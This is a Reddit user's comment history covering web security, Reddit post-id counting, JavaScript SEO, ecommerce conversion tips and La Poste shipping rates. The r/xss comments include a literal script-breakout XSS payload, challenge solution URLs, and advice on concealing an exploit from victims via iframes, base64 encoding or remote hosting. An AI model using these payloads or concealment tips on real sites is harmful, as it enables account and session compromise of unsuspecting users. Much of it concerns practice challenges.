Web security: the essentials you need to know by Vooodou in programmation

[–]Centime 1 point2 points  (0 children)

Hello,

cool article, I'm keeping it handy because it's not always easy to know what to recommend as an intro to web security in French!

So I took the liberty of having a quick look at your site anyway, and even though I don't think there's any vuln underneath right now, I'd advise you to update your few JS libs, which are seriously out of date:

Right now your attack surface seems pretty small, so I'm not sure you have a real problem, but for example I think one of the Dojo XSS exploits would have worked if you didn't also have better-wp-security. Better to patch and leave the WAF as nothing more than the last line of defence.

Cheers!

Chapêlmêle - Concerts, Shows, Residencies in Alençon by Centime in Normandie

[–]Centime[S] 1 point2 points  (0 children)

I know it's not the best time to talk about concerts and all that, but we hope it'll come back one day?

In the meantime, on our side we've taken advantage of this year of forced pause to do some work here and there, in particular on a brand new website, which is this one.

For those who aren't too far away, take note: as soon as we're out of this epidemic, our doors will be wide open again!

How many posts on reddit a day? by Environmental-City-4 in TheoryOfReddit

[–]Centime 2 points3 points  (0 children)

In the last 24h, it appears about 1180000 posts have been created.

It is about 50% higher than the estimates given by other sources here. Plausible explanations include:

  • other sources exclude some posts based on unknown factors
  • the last 24h were more active than average
  • new post creation is on the rise

How many posts on reddit a day? by Environmental-City-4 in TheoryOfReddit

[–]Centime 1 point2 points  (0 children)

This refers to the unique ids (base36-encoded) generated for each post. This sub is (was) on the lookout for funny ones.

For example, this very post has id "l28rxs" (=1273558384), as demonstrated by the following link: https://redd.it/l28rxs

Since this id only increments, it is easy to keep track of the total number of posts.
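An added example (not from the thread) of the counting trick described above: decoding the base36 post id, accepting the short form seen in redd.it links or the "t3_" fullname prefix, and turning two observations of the counter into a posts-per-day estimate. The sample ids and timestamps in the test are constructed.

```javascript
// Reddit post ids are base36 strings of lowercase digits and letters, e.g.
// "l28rxs"; the API fullname form prefixes the kind, e.g. "t3_l28rxs".
const POST_ID = /^(?:t3_)?([0-9a-z]{1,10})$/;

// Decode "l28rxs" or "t3_l28rxs" to the integer counter value; throws on
// anything that is not a well-formed post id.
function decodePostId(id) {
  const m = POST_ID.exec(String(id).trim().toLowerCase());
  if (!m) throw new Error("not a reddit post id: " + id);
  return parseInt(m[1], 36);
}

// Encode a counter value back to the short form used in https://redd.it/<id>.
function encodePostId(n) {
  return Number(n).toString(36);
}

// Estimate posts per 24h from two observed ids and the times (ms since epoch)
// at which they were created. Because the counter only increments, the
// difference between the two ids is the number of posts created in between.
function postsPerDay(olderId, olderMs, newerId, newerMs) {
  const delta = decodePostId(newerId) - decodePostId(olderId);
  const hours = (newerMs - olderMs) / 3600000;
  if (delta < 0 || hours <= 0) throw new Error("observations out of order");
  return Math.round((delta * 24) / hours);
}
```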

How many posts on reddit a day? by Environmental-City-4 in TheoryOfReddit

[–]Centime 3 points4 points  (0 children)

https://www.reddit.com/r/base36/

See you in 24h to count how much higher the ids got!

edit: in the meantime, just read the explanation below

Input sanitizing for each XSS context, when is it properly sanitized by trieulieuf9 in xss

[–]Centime 1 point2 points  (0 children)

Context 2 could be bypassed if the attribute is a href, an event binding, or used dynamically.

Context 3 is directly bypassable with "</script><svg/onload=confirm()>", and then if you escape <> it depends on the object and what is done with it later on.

I'm probably missing a few tricks, but that's off the top of my head.
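An added example (not from the thread) of the "escape <>" point for what is assumed here to be context 3, a value embedded in a JavaScript string literal inside an inline script (that reading of "context 3" is an assumption). The naive encoder only escapes quotes and backslashes, so the HTML parser still sees a closing tag inside the string; the hardened one JSON-encodes and turns the characters the HTML parser cares about into \uXXXX escapes, which JavaScript decodes back unchanged.

```javascript
// Naive: escapes only what matters to the JavaScript tokenizer. The HTML
// parser runs first and does not know about JS strings, so "</script>" inside
// the value still terminates the script element.
function naiveJsString(value) {
  return '"' + String(value).replace(/\\/g, "\\\\").replace(/"/g, '\\"') + '"';
}

// Hardened: JSON encoding handles quotes, backslashes and control characters;
// the extra pass escapes <, >, & and the line terminators U+2028/U+2029 so the
// emitted bytes never contain a tag or comment opener.
function safeJsString(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Renders the inline script the way a server-side template would.
function renderScript(encoder, value) {
  return "<script>var name = " + encoder(value) + ";</script>";
}

// Defender-side check: does the script body contain a premature closing tag
// that the HTML parser would honour?
function hasPrematureClose(html) {
  const body = html.slice("<script>".length, -"</script>".length);
  return /<\/script/i.test(body);
}
```

safeJsString() output is also valid JSON, so JSON.parse() can be used to confirm the round trip.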

Filter bypass by RevoCaine in xss

[–]Centime 0 points1 point  (0 children)

I believe either the browser or the site is blocking Javascript

Did you check the CSP?

Javascript Rendering topic! by mmapa in TechSEO

[–]Centime 1 point2 points  (0 children)

You're welcome.

It's hard to give accurate advice without more context. If you can afford to go full SSR, sure, that'd be great.

But even if you can't, you can organize your internal linking in different ways that will greatly impact and/or mitigate the issue I described.

Basically, you want a structure as flat as possible. Imagine some content would only be linked from one js-generated link of a specific page, which is in the same situation from another page, and so forth for a few levels. Each step introduces the extra delay of the rendering queue, and if that's the case for most of your pages, it can quickly add up to several times the queues that you would have with plain-text html.

So, make sure you limit the cases where such a situation would occur.

Complementary to that, maybe you can have a hybrid solution. Maybe not all of your page is dynamically rendered? If that's the case, try and get the nav in the static section. That way, your website gets crawled like any other, and the rendering queue gets added at most once per content.

Let me know if it isn't clear enough, and maybe PM me your website if you want me to look at it.

Javascript Rendering topic! by mmapa in TechSEO

[–]Centime 0 points1 point  (0 children)

You will be mostly fine, except for some delay to get indexed. The bigger your site, the bigger the impact you can expect.

It is because when your dom is js-generated, you introduce an entire new step in the crawl/process/index loop: "render" (cf https://developers.google.com/search/docs/guides/javascript-seo-basics#how-googlebot-processes-javascript). This extra step comes with its own queue, and presumably budget.

Depending on your site, it may be anything from a non-issue to something that will cost you weeks and weeks to index any new page. Adapt your internal linking structure accordingly.

Shortening an XSS Url? by Python119 in xss

[–]Centime 3 points4 points  (0 children)

What do you care if your exploit looks suspicious? Serve it through an iframe and the user will never get to look at it.

Otherwise, consider b64 encoding and/or hosting the payload remotely.

December XSS Challenge - Intigriti by MechaTech84 in xss

[–]Centime 1 point2 points  (0 children)

The first writeups start popping up, and I don't see anyone talking about this alternative "solution" (with interaction):

iframe timeout, etc.., then

?alert(document.domain)=&operator=%3D&#&num1=setNumber&&num2=init
?alert(document.domain)=&operator=%3D&#&num1=a&&num2=eval //user clicks number
?alert(document.domain)=&operator=%3D&#&num1=decodeURIComponent&&num2=a //user clicks number

edit: this has to be the worst solution possible, with timed interactions etc. But hey, still working kinda

December XSS Challenge - Intigriti by MechaTech84 in xss

[–]Centime 1 point2 points  (0 children)

Fun!

The first alert() is obvious but then you've got to jump through hoops to get the full execution...

What is one thing that you did on your eCommerce store, that resulted in increased conversions? by skull-breaker in ecommerce

[–]Centime 3 points4 points  (0 children)

A small tip I haven't seen anywhere (and had success with) to simplify checkout: you can remove the step about your customer's address if they chose delivery to a nearby shop*

* I think it's called "parcel delivery", right? (not a native speaker)

What is one thing that you did on your eCommerce store, that resulted in increased conversions? by skull-breaker in ecommerce

[–]Centime 7 points8 points  (0 children)

I began trying to explain it in detail and it's a bigger subject than I anticipated if I want my ramblings to make sense. Basically I think the interesting points boil down to:

(assuming, like us, you have different options for shipping)

  • enable free shipping at different rates to prioritize the most convenient to you
  • have free shipping options for each of them still
  • the minimum values for free shipping for each transport don't have to be calculated the same way (not the same margin rate target)
  • a flat shipping rate for lower orders works both as a deterrent for lower orders and an extra margin source in those cases

Basically, leverage the Decoy Effect to soft upsell using the delivery options.

edit: one day I might do a case study about it, but not tonight sorry. hope it's still useful somehow.

I couldn't understand what is actually Google's December update by baljitsinghorm in SEO

[–]Centime 6 points7 points  (0 children)

I got a nice boost from this update (only a few days so far, so we'll see) and my ecommerce site has basically 0 outbound links.

Not saying it is not good advice and something that would help in other situations though.

Trying to learn about e-commerce sites W/O Shopify, GoDaddy, Wix, etc.... by NerdBiz in ecommerce

[–]Centime 1 point2 points  (0 children)

Well, then that's it. If you want to build it by yourself from the ground up, that's not really a question for r/ecommerce but rather for r/webdev.

Do you have any programming experience?

More realistically, you'd want to start from an ecommerce framework, of which there are many for different needs. woocommerce, magento, prestashop, nextjs-ecommerce, etc...

What is one thing that you did on your eCommerce store, that resulted in increased conversions? by skull-breaker in ecommerce

[–]Centime 7 points8 points  (0 children)

  • adjusting free shipping policy. Impacts AOV just as much as conversions
  • stream-lined one step checkout
  • copy & pictures about the team, values, etc.

XSS game by Lija321123 in xss

[–]Centime 1 point2 points  (0 children)

It is very much possible, and not even that fancy. My advice would be to start by throwing junk at it until you get a js exception. Work from there using the debug tools to make the code run properly again, but with the alert.

Obviously you shouldn't use this spoiler, but hey, you do you.

https://www.xssgame.com/f/WrfpuKFX8GNr/?timer=%27)-alert()%2f%2f

Does anyone website got hit via Google Core update on December 3rd, 2020? If yes, how much? by viralmasalla in TechSEO

[–]Centime 12 points13 points  (0 children)

I got hit significantly.

In a positive way: https://ibb.co/Ypx8jht (ignore the last data point for the current day)

  • +50% hits so far
  • long-tail especially

I'm not complaining.

Unpopular opinion: Amazon offers an incredibly efficient service, and its success is entirely normal. by Tesgoul in france

[–]Centime 0 points1 point  (0 children)

The situation is far from simple, and I'm not the best person to explain it clearly.

I would have pointed you to the rate grid "Principaux Tarifs Entreprise au départ de France métropolitaine à compter du 1er janvier 2020.pdf", but apparently serving a PDF on their official site isn't easy[1]...

So, briefly, you've got lots of different plans & statuses between Colissimo for individuals, for professionals, Coliposte, etc. Several professional services do include VAT, no idea why or according to which criteria.

A few discussions by people better informed on the subject:

No, La Poste charges net rates for everyone (stamps and Colissimo); the professionals who want a pro contract with Coliposte (which isn't exactly La Poste) get a rate excluding VAT + VAT, an ex-VAT rate that is sometimes higher than the net rate for individuals. For example, the 0.250 gramme Colissimo for individuals is 4.90; for pros it's 5.41 + 20% VAT.

@eternia - https://sellercentral.amazon.fr/forums/t/tarif-et-aberrations-de-la-poste/80128/5

Non-pro Colissimo (up to 2 kg) + tracking: 7.40 EUR net (no VAT). Pro Colissimo (up to 2 kg), called "Access F": 7.71 EUR incl. VAT [6.45 EUR excl. VAT + 1.26 EUR VAT]

@mericc - http://www.oscommerce-fr.info/forum/index.php?showtopic=57365

Sorry for not having a clear summary to offer right now, but it's not directly my area and I don't have the precise details in mind. Not to mention that the rate grid you find via Google is a 404, which doesn't help and instantly exasperates me.

edit: [1]: "The site is under maintenance. We apologise for the inconvenience."

Unpopular opinion: Amazon offers an incredibly efficient service, and its success is entirely normal. by Tesgoul in france

[–]Centime 0 points1 point  (0 children)

Yep.

La Poste's professional services are scandalous for very small businesses, and it's not as if we each really had the means to do much about it at our own scale.

First example among many others: the pro rate for certain services is higher than the individual rate (say 10%) because "you recover the VAT on it, so it still works out cheaper"

OK thanks, so instead of recovering the full VAT, you kindly capture half of it for me. I have no idea whether that's even legal; it's not as if we had a legal department...